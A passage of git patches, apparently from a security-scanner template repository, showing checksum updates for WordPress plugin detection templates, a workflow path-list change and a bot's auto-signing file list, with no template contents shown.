+http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:d48b8d80f0598feb9361875373bd47230e3f2aeb -http/technologies/wordpress/plugins/pixelyoursite.yaml:c69b9ccb366e71c28a5588e934c4c63db1ec1bbf -http/technologies/wordpress/plugins/polylang.yaml:30754775ac62eb131c63e98ac65e47ecece73ff8 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:460fab60cfb0249bcb4a8690892e9519a45d29ab -http/technologies/wordpress/plugins/post-smtp.yaml:31b44e1a0b1c9598a4c6f3ff7b64dcc9f94020e1 -http/technologies/wordpress/plugins/post-types-order.yaml:a76263093a49d00b239951dedb87d2983d83ea56 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:2e24660e1b4d9aeda2d9da70f361d4af9882ae93 -http/technologies/wordpress/plugins/pretty-link.yaml:5d8544745516f2f0458f13e234909d777861f5aa -http/technologies/wordpress/plugins/really-simple-captcha.yaml:53b4d681543b1048a408f6dd43a663c23dfa3f08 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:aeee6f3b354431e5580fc1bb40f8d4e8c13c6b97 -http/technologies/wordpress/plugins/redirection.yaml:13d3a797207525b0fa5e4e321f87da17e8b16032 -http/technologies/wordpress/plugins/redux-framework.yaml:049c3b75ebedca5181e6eb343d8e3d93917400e1 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:36d0e9b300d7d6d4494b174c16144944cab8ae6a -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:f57ca8da4c1a67395d62242d19ac6c7320c0b906 -http/technologies/wordpress/plugins/safe-svg.yaml:83bafa1656ce942789cbfae0ab2014ef96da85aa -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:daf00203a7e5a354d2f42375cfd1edd22febec0c -http/technologies/wordpress/plugins/sg-cachepress.yaml:73fc6c8a3d96a71d91fab1a13dc28120faabea98 -http/technologies/wordpress/plugins/sg-security.yaml:e792b82d7bc321071482788c084cbcedc6fe9040 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:10301c73c0537095042c120d66ef9ed3e1dc07ff -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:6ccf0a6c77515cb88be5663342b3dcb62dafa301 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:04ff62468af805f06152679c99793fe6870c8023 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:29908a1c18a25319f66d4feba42cd0dbf5aaa1e0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:af6b21c53ac7bce137dc19ad792fcb4b4e201244 -http/technologies/wordpress/plugins/smart-slider-3.yaml:d36236aa3623be2e834972c1cabb27fb5f56035b -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:6022e7e6cbbd6bd4cdb19e76c22e77e1de0543f2 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:771151efeea9b53c529b5f917f1b02df41fe0e2b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:6bb2ccbdcb2ce23af12bee728f557359da021598 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:66a97450ea54a800f87db8b7082dba0df893428b +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:7b32d898aaea0c9908a4765c41d1473280fd651c -http/technologies/wordpress/plugins/tablepress.yaml:c2723b2de920a350d201ab774fe1751ab323f548 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c11d35c694fd69a34d48037a4bb3bd8e6fe9857e -http/technologies/wordpress/plugins/templately.yaml:ade0d4ef0de4ee52b092ca6ccf552e802cc03d9e -http/technologies/wordpress/plugins/the-events-calendar.yaml:8a0b4005e5c6b1ede12c6a0a051a9c83d00ac798 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:b5d7053c887f0a7e838f5c1471c6ccd087c40acd -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a187e259be2eeb2913a07e25246618d6a6c064c1 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:4ca1e11ca0c767a03628285421281969898e68e9 -http/technologies/wordpress/plugins/under-construction-page.yaml:b4948247ca93389fe46139edbc4dbf921d922d48 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:a7a21674d1d2d96cf05b764b97516bec421f6349 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:80ef97bd7dfd5b27c4bf7753c395cacfc3cfbf02 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:97cde635dba3f5dac59bcf8b07ec3cb4f25f964f -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4d04d3a72874e95c326e912614f0d61af5700196 -http/technologies/wordpress/plugins/webp-express.yaml:08fbd3e6f747eca0ac990b184579f2896e6f8ad7 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:b7128ba299f6cf6163d561e68dc1331f8fe571b6 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d6637a73c4ba6d540ef4f80a74f33552de0a7502 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:02ee4b3365959029e77b7ef8073e07217dbc6cc1 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:a9e82eb15ab0633fe2f6b2ac213caf96155f7497 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:221da0df01b0720dc4b0a9fe09bf72e0c11ba609 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:9f7efe4c2493ebd2879c8fdd4947febfe61b13a5 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:2f0cd090510ea716b24a8271ef51637db7463df9 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:f0939678bf870113c45a1242d32091f30d794c55 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:48dfeb1de94ba70923e3f54cfdaab5b8a1dc8fe1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:ef04e2c0f7ca3a95825a71b32a2a614e9212ff5f -http/technologies/wordpress/plugins/woocommerce.yaml:6e33a8ec49f4e851da42b185f2978fa11ab1bf0b -http/technologies/wordpress/plugins/wordfence.yaml:3cfee733fd55cae44fa04c7f501c039a8c3c3556 -http/technologies/wordpress/plugins/wordpress-importer.yaml:8be756aaf7d0e73ef24d28f4abb85f91627bed22 -http/technologies/wordpress/plugins/wordpress-seo.yaml:55afb2fe070bf5ebfb106df88554fff5dc5555f3 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:11fb19a66b1bd071fedb20c46ea3a808ae176b9d -http/technologies/wordpress/plugins/wp-crontrol.yaml:3714b65cedd83ea9e318af9904fb02e5b3f8e7d8 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:06cfd8d4fb943aec5e640d2dc877903627c4990a -http/technologies/wordpress/plugins/wp-file-manager.yaml:f1e344c60aa96013438a164f2f478a0cc8bc4afc -http/technologies/wordpress/plugins/wp-google-maps.yaml:12ea7554db4e2269e35def19d88f758e26f562d6 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:9c93b1f625cb51b145b0106c990bcc14c9d4ea1d -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:2252da283dbea2c8d5fb254db7a4030db619c0cf -http/technologies/wordpress/plugins/wp-migrate-db.yaml:e6942479c85b4f9c28b41b4973231a0bf1322fab -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0265f004beff84b5c6a4db99e7c504e79e907c9a -http/technologies/wordpress/plugins/wp-optimize.yaml:609310d79ffe730b1104ccc20117df56183f073e -http/technologies/wordpress/plugins/wp-pagenavi.yaml:4019b17fd7dc0ac43997c6b8d41a3fc06361aab9 -http/technologies/wordpress/plugins/wp-reset.yaml:da00753df734541203bcfa3d03f3eb479b079fc5 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:376a2c3e07ed0f0cc2838e3f525df6eaee5b08f9 -http/technologies/wordpress/plugins/wp-rollback.yaml:0f6fe29769659c8bd4f1180be5b65acbc4c57959 -http/technologies/wordpress/plugins/wp-seopress.yaml:34e80c3738c02480eb8ec534d195746bf49ebd91 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:7cd7ec9d42cf0bd115898711714c1a6cda1b9342 -http/technologies/wordpress/plugins/wp-smushit.yaml:54fb939b43ccbcde323c545e3ea38ca81c5ac17f -http/technologies/wordpress/plugins/wp-statistics.yaml:875c961789ad4bdcde0c64e060f89683bb4edd1f -http/technologies/wordpress/plugins/wp-super-cache.yaml:f061c80cc16b5678480718f5c6244df7b3317189 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:4458b78330c65d0e119720d5cee87cab8b303b9c -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:6abe6c23fcbaf9f8a86c5cf266e4b5b9cb4bcfa6 -http/technologies/wordpress/plugins/wpforms-lite.yaml:dceaf29120ddb768a62c4ec7e352fbc59f2a0973 -http/technologies/wordpress/plugins/wps-hide-login.yaml:7738c75e17dfa3a3cf2c17ad3e0672b139c6c7ac -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:5ab0ea54ff29c94f40363acfa78ab5b850f7cdc1 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:90ddf2a108a19542c890e685db648e604eac2c49 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8936,7 +8938,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:366f7804fc6a488b179c41bbf91fb41eac849434 +templates-checksum.txt:b79a363e6d3241bd08dffcd9c8a0dbc2ea25a2eb vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From e685a3a935c972a7a7b89f3cdce7e4ef9f6d7123 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:24:36 +0000 Subject: [PATCH 1743/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c0d1f8fc65..a280c9f599 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,7 +5,9 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' + - 'http/cves/2024/CVE-2024-6922.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' + - 'http/misconfiguration/installer/quickcms-installer.yaml' - 'http/osint/user-enumeration/substack.yaml' - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' From da34fb815663d7fc23a441e765018a0312795164 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:25:42 +0000 Subject: [PATCH 1744/1841] Auto Template Signing [Tue Jul 30 07:25:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6922.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + 